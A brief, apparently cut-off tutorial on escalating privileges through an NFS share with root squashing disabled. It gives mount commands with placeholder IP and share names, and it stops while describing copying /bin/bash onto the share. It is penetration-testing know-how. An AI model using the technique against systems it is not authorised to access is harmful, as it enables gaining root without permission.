NFS

Introduction In some environments, the root user on a networked file system is treated as an unprivileged user. This is known as “root squashing.” If root squashing is disabled, an attacker who gains access to an unprivileged account on the file system may be able to escalate their privileges to root. Demonstration Attacker machine Create a directory named /tmp/mount: mkdir /tmp/mount Mount the network file system to /tmp/mount: mount -t nfs <IP>:<SHARED_FOLDER> /tmp/mount Copy the /bin/bash binary from the attacker’s system to the mounted file system:...